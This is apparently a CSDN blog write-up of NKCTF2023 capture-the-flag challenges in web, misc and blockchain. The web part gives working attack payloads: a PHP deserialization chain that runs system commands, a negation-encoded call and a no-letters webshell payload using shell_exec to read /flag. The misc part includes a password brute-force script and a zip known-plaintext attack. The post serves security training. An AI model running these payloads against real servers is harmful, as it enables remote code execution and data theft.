[NKCTF2023]web/misc/blockchain-wp

已于 2023-03-28 15:45:42 修改
阅读量1.2k 收藏 5
点赞数 1
文章标签: 网络安全
于 2023-03-27 21:33:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63923205/article/details/129804232
版权

 总体体验还是不错的,感谢我的二进制队友带我。

WEB

babyphp

Pop链,链子__destruct()->__toString()->__invoke(),最后要绕一个正则匹配,通过dir命令发现flag在/f1ag中,利用剩下没被过滤的通配符进行匹配,exp:

<?php
class Welcome {
    public $name;
    public $arg;
}
 
class Happy {
    public $shell;
    public $cmd;
}
 
class Hell0 {
    public $func;
}

$a = new Welcome;
$a -> name = "welcome_to_NKCTF";
$a -> arg = new Hell0;
$a -> arg -> func = new Happy;
$a -> arg -> func -> shell = 'system';
$a -> arg -> func -> cmd = 'more /[^b]1[^b][^b]';

echo serialize($a);
?>

easyphp

第一层md5弱比较,数组绕过;

第二层sha1强比较且做了强制类型转化,用PDF那个payload绕过;

第三层用浮点数性质绕过,114514.1;

第四层用[被解析后不会解析剩下的符号这一特性绕过,NS[CTF.go;

第五层取反绕过,(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);。

easy_pms

参考http://www.360doc.com/content/12/0121/07/77981587_1066789891.shtml这篇文章,先激活cookie,再rce:

hard_php

经典无字母及部分字符webshell,限制长度105,这里用了之前ctfshow极限rce的一个payload。同时phpinfo发现存在disable_function,但是shell_exec没有被过滤。题目环境不出网,就用了重定向把flag送到1.txt里面再访问即可。Payload:

NKCTF=$_=(_/_._)[_];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;\$\$_[_](\$\$_[__]);&_=shell_exec&__=cat /flag > 1.txt

 

webpagetest

AVD-2022-1474319漏洞,参考文章https://xz.aliyun.com/t/11798#toc-1

借助phpggc程序生成执行id命令的phar文件并发送,一条龙服务就行了

MISC

hard-misc

 签到题,base32+发公众号

NKCTF2023问卷调查 

 

blue

经典取证,flag在回收站:

THMaster 

找东方wiki的修改器,链接寄了,去贴吧找

thprac.v2.2.1.2.exe

进入练习模式前改分,进入

提示解密了,在replay看到了叫flag的记录

看完了没找到,问了一下出题人,在文件里,用010打开,在文件末

三体

 看文件尾发现一半flag,知道flag是按RGB来的,然后就按RGB去搜},就找到另一半flag了。

 

两部分拼接起来就是flag了。

easy_bmp

 宽高题,高就直接改就行了,不要改太高:

宽要根据bmp性质算一下,因为是32位深,所以1589466/4/283=1404,图片可以扔ps里看:

拼起来就是压缩包密码,解压还是一张bmp,这次宽高都要自己算,因为深度是8,所以大小就是分辨率,猜测直接开方,大概是360左右,拿到flag:

easy_rgb 

Montage+gaps拼图得到key解压rgb.rar:

解压出来3个txt文件,按照rgb顺序一位一位取发现是一个压缩包,写脚本提取:

#读取字节
file1 = open("r.txt","rb")
file2 = open("g.txt","rb")
file3 = open("b.txt","rb")

#写入字节
p = open("decode.txt","wb")

data = []

#循环1669次,每次依文件顺序读取
for a in range(149):
	#设定每次往后读取一个字节
    i = file1.read(1)
    data.append(i)
    
    i = file2.read(1)
    data.append(i)
    
    i = file3.read(1)
    data.append(i)

for i in data:
    p.write(i)

 把decode.txt的内容里面的16进制转一下就是压缩包了,aes-128,弱密钥:

easy_word

爆破下密码:

import string
import hashlib
s = 'b75d1224'
chars = string.ascii_letters + string.digits  # 构造字符集
print (chars)
for i in chars:
    for j in chars:
        for k in chars:
            for n in chars:
                psw =  'h' + i + j + 'vO' + k + n + '0'
                sha256 = hashlib.sha256(psw.encode(encoding='utf-8')).hexdigest()
                if s ==sha256[0:8]:
                    print(psw)

 

把到文档里面密码删掉,解压docx文件,发现藏了个图片

经过尝试是cloacked-pixel,key就是图片上的:

first spam of rabbit year

https://www.spammimic.com/decode.shtml解密:

社会主义核心价值观编码:

 与佛论禅https://fy.by950.top/,密码rabbit:

检查这些字符发现零宽:

 结合结尾的tip:47&13,密文是rot47处理,密钥是rot13处理,解rabbit即可

baby_music

看十六进制,发现data很有规律,不是1027就是1127,猜测表示二进制,写脚本提取:

def bytes2hex(bytes):
    num = len(bytes)
    hexstr = u""
    for i in range(num):
        t = u"%x" % bytes[i]
        if len(t) % 2:
            hexstr += u""
        hexstr += t
    return hexstr.upper()

#读取字节
file1 = open("flag.wav","rb")


#写入字节
p = open("flag1.txt","wb")

data = []

for a in range(20000000):
	#设定每次往后读取一个字节
    i = file1.read(2)
    i = bytes2hex(i)
    if i == '1027':
        data.append(b'0')
    elif i == '1127':
        data.append(b'1')
    elif i == '':
        break

for i in data:
    p.write(i)

 提取出来后from bin就是压缩包了。注释是一段摩斯电码,告诉我们密码是16位随机字符,因此肯定没法爆破,但是zip里面是png,且算法符合明文攻击的前提,因此用bkcrack爆破密钥,得到flag.png:

misc?iot! 

由固件名得知开发板型号是STM32F103C8,经典的ARM架构开发板,用IDA选择ARM小端序架构就能反编译出来。

 从start一路跟进找到了关键的加密函数,观察特征猜测是RC4加密。

很容易找到加密数据段和密钥。

Blockchain

SignIn 

划到最下面创建合约那一条,拿到合约内容,hex转字符即可。

HelloWorld 

web3py:

from web3 import Web3, HTTPProvider

w3 = Web3(HTTPProvider('http://blockchain.247533.top:10020'))

assert w3.isConnected()

# create a account
pk = '私钥'
account = w3.eth.account.privateKeyToAccount(pk)

# print(account.address)
abi = '[{"inputs":[{"internalType":"string","name":"_greeting","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"greet","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"_greeting","type":"string"}],"name":"setGreeting","outputs":[],"stateMutability":"nonpayable","type":"function"}]'

contract = w3.eth.contract(address='0x781CA0733773aBE77138b00B77B7D8D79aAEd52A', abi=abi)

# build a transaction
tx = contract.functions.setGreeting('Hello,NKCTF2023').buildTransaction({'from': account.address,'nonce': w3.eth.getTransactionCount(account.address),'gas': 1000000,'gasPrice': w3.toWei('1', 'gwei'),})

# sign a transaction
signed_tx = account.signTransaction(tx)

# send a transaction
tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)

# get transaction receipt to get contract address
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)

print(tx_receipt)

decompile_revenge

拿到合约内容,反编译:

这4串sha256用题目给的somd5直接拿下。 

mrl64
关注
NKCTF_WP
m0_73954357的博客
03-27 674
aa
[NKCTF2023]web/misc/Social Engineering-WP
qq_43328446的博客
03-27 1452
nkctf2023
BlockChain 薅羊毛 溢出攻击
最新发布
qq_69100706的博客
08-20 287
在CTF(Capture The Flag)竞赛中,区块链和智能合约领域的挑战越来越常见,尤其是随着DeFi(Decentralized Finance)的兴起。其中,“薅羊毛”和“溢出攻击”是针对智能合约的两种典型攻击方式。
2023NKCTF----web
qq_51233573的博客
05-15 735
一个一个慢慢绕过第一层 MD5弱比较参数a和b选其中一个进行绕过QNKCDZO240610708第二层 sha1绕过用两个sha1相同的值进行绕过(注意这里不能用burp)第三层 intval 参考这个用114514.01进行绕过第四层NS_CTF.go对这个参数进行传参要注意的是 不能又_ 用[代替最后一层过滤掉了所有的可见字符参考这篇文章 构造无数字字符的命令找一个在线运行php的。
NKCTF-web(记一次越权)
jiyi_guoshu的博客
03-14 2699
这里写自定义目录标题题目如下进入网页,发现是一个登陆框,先注册一个账户点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。尝试注册admin为用户名的账户,网页提示用户名已被注册。 题目如下 进入网页,发现是一个登陆框,先注册一个账户 点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。 尝试注册admin为用户名的账户,网页提示用户名已被注册。 ...
NKCTF2023 web部分wp
arcuied
03-27 413
NKCTF2023 web部分wp
深度学习目标检测数据VisDrone2019(to yolo / voc / coco)---MMDetection数据篇
热门推荐
qq_41627642的博客
05-11 3万+
1、VisDrone2019数据集介绍 配备摄像头的无人机(或通用无人机)已被快速部署到广泛的应用领域,包括农业、航空摄影、快速交付和监视。因此,从这些平台上收集的视觉数据的自动理解要求越来越高,这使得计算机视觉与无人机的关系越来越密切。我们很高兴为各种重要的计算机视觉任务展示一个大型基准,并仔细注释了地面真相,命名为VisDrone,使视觉与无人机相遇。VisDrone2019数据集由天津大学机器学习和数据挖掘实验室AISKYEYE团队收集。基准数据集包括288个视频片段,由261908帧和10209幅静
Linux的防火墙设置及Tomcat安装与配置
qq_42654356的博客
03-13 2656
1.如果是云服务器(列如:阿里云,需要保证阿里云的策略安全组的开放!) 1.1查看防火墙服务状态 [root@suzhongde suzhongde]# systemctl status firewalld ● firewalld.service - firewalld - dynamic firewall daemon Loaded: loaded (/usr/lib/systemd/system/firewalld.service; enabled; vendor preset: enabl
FAILED: out/host/linux-x86/obj/EXECUTABLES/checkpolicy_intermediates/policy_scan.c
蚁人日记
07-23 3318
[ 1% 1543/95017] Export includes file: -- out/host/linux-x86/obj/STATIC_LIBRARIES/libsepol_intermediates/export_includes [ 1% 1544/95017] target C++: memory_replay_tests <= system/extras/...
Y86-64模拟器的安装与出现对'matherr'未定义引用问题的解决
g_x_l_233的博客
11-11 2520
安装Y86-64模拟器的GUI界面的过程中,出现对'matherr'未定义的引用的错误,四处寻找没找到答案,之后根据make后的错误提示解决了错误
基于区块链的农产品溯源系统——Blockchain Fabric Trace
笔记|思路|总结
09-02 1330
Bug4:ERROR in ch.qos.logback.core.rolling.RollingFileAppender[file_info] - openFile(/home/ruoyi/logs/sys-info.log,true) call failed. java.io.FileNotFoundException: /home/ruoyi/logs/sys-info.log (没有那个文件或目录)解决:更换node、npm版本:node(12.22.12)、npm(6.14.16)
2023NKCTF web题解
m0_62107966的博客
03-26 962
考察php函数漏洞,有md5、sha1、intval、非法参数名NS_CTF.go绕过、无数字字母绕过。第五层 绕无数字字母,使用或绕过即可。要先通过find命令找到flag文件,最后在cat获取即可。第四层是非法参数名NS_CTF.go的解决, 将。首先第一层if要绕md5,用数组即可。第二层是sha1绕过,用碰撞码绕过。第三层是绕intval 使用小数即可。第五层 绕无数字字母,使用或绕过即可。要先通过find命令找到flag文件,最后在cat获取即可。 ("%13%19%13%14成功拿到flag。
探索未来科技:CTF-Blockchain —— 一个创新的区块链安全挑战平台
gitblog_00061的博客
04-13 520
探索未来科技:CTF-Blockchain —— 一个创新的区块链安全挑战平台 项目地址:https://gitcode.com/minaminao/ctf-blockchain 简介 CTF-Blockchain 是一款面向网络安全爱好者和专业人士的在线平台,它将传统的Capture The Flag(CTF)竞赛模式与区块链技术相结合,为学习、实践和提升区块链安全性提供了全新的途径。 技术分析...
NKCTF2023 web wp
adorkablezhenbai的博客
03-27 1150
web新手签到NKCTF,简单记录两个签到题。
Bctf Blockchain 两则详解——带你玩转区块链
Fly_鹏程万里
01-07 2995
近来各大ctf中,纷纷冒出了一个新题型——Blockchain,从HCTF开始到BCTF,作为一只web狗,还是要紧跟时代学习一下(毕竟web狗啥都要学),今天我们就来详细讨论一下这两题的解法,以及用到的知识点。 EOSGame 题目地址为:This contract is at 0x804d8B0f43C57b5Ba940c1d1132d03f1da83631F in Ropsten...
NKCTF[eazy_baby_apk](DES名字的AES
can_no_volcano的博客
03-26 232
下文发现MD5加密的confusion,所以我们对其进行MD5加密再充当填充物,最后看解密代码。key1中的e全部用3代替可以得到第一种填充 r3v3rs3car3fully。key1是偏移量,所以vector2就是密钥 ,再对其AES加密可得flag。由此估计,这就是密文。我们对其进行DES解密发现解密不出来,所以继续看代码。找到主要函数部分,一看就是一堆提示信息,向AES加密和DES。接着往下看vector2的内容。apk文件用jadx打开。
NKCTF2024 | 部分WP
ULGANOY的博客
03-25 2088
NKCTF2024 部分 WP
2023 NKCTF --- Crypto ezRSA wp
3tefanie丶zhou的博客
03-28 968
【世间情种偏好伤心事,苦中作乐,乐在其中,不伤心又如何算得上痴情人。】
近期CTF web
qq_61768489的博客
04-08 1508
NKCTF2023 ctfshow愚人赛 杭师大CTF
Log data follows: | DEBUG: Executing shell function do_configure | MISC_ARG is -hdf_type xsa -yamlconf /opt/pkg/embedPro/xilinx-zcu102-2020.1/build/tmp/work/zcu102_zynqmp-xilinx-linux/device-tree/xilinx-v2020.1+gitAUTOINC+bc84458333-r0/device-tree.yaml | APP_ARG is -app "device-tree" | Using xsct from: /opt/pkg/petalinux/tools/xsct//bin/xsct | cmd is: xsct -sdx -nodisp /opt/pkg/embedPro/xilinx-zcu102-2020.1/build/tmp/work/zcu102_zynqmp-xilinx-linux/device-tree/xilinx-v2020.1+gitAUTOINC+bc84458333-r0/dtgen.tcl -ws /opt/pkg/embedPro/xilinx-zcu102-2020.1/project-spec/configs/../../components/plnx_workspace/device-tree -pname device-tree -rp /opt/pkg/embedPro/xilinx-zcu102-2020.1/build/tmp/work/zcu102_zynqmp-xilinx-linux/device-tree/xilinx-v2020.1+gitAUTOINC+bc84458333-r0/git -processor psu_cortexa53_0 -hdf /opt/pkg/embedPro/xilinx-zcu102-2020.1/build/tmp/deploy/images/zcu102-zynqmp/Xilinx-zcu102-zynqmp.xsa -arch 64 -app "device-tree" -hdf_type xsa -yamlconf /opt/pkg/embedPro/xilinx-zcu102-2020.1/build/tmp/work/zcu102_zynqmp-xilinx-linux/device-tree/xilinx-v2020.1+gitAUTOINC+bc84458333-r0/device-tree.yaml
06-10
这是一个 Yocto Project 中的 recipe do_configure 执行时的 log。可以看到,这个 recipe 使用了 MISC_ARG 和 APP_ARG 两个参数,其中 MISC_ARG 的值为 "-hdf_type xsa -yamlconf /opt/pkg/embedPro/xilinx-zcu102-2020.1/build/tmp/work/zcu102_zynqmp-xilinx-linux/device-tree/xilinx-v2020.1+gitAUTOINC+bc84458333-r0/device-tree.yaml",APP_ARG 的值为 "-app "device-tree""。这个 recipe 运行了一个名为 xsct 的工具,使用了一些参数来生成设备树文件。具体来说,xsct 工具的参数包括 -sdx(表示使用 SDx 工具链),-nodisp(表示不显示界面),-ws(表示工作空间目录),-pname(表示项目名),-rp(表示 Git 仓库路径),-processor(表示处理器名称),-hdf(表示硬件定义文件路径),-arch(表示架构,64 表示使用 64 位架构),-app(表示应用名称),-hdf_type(表示硬件定义文件类型)等。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值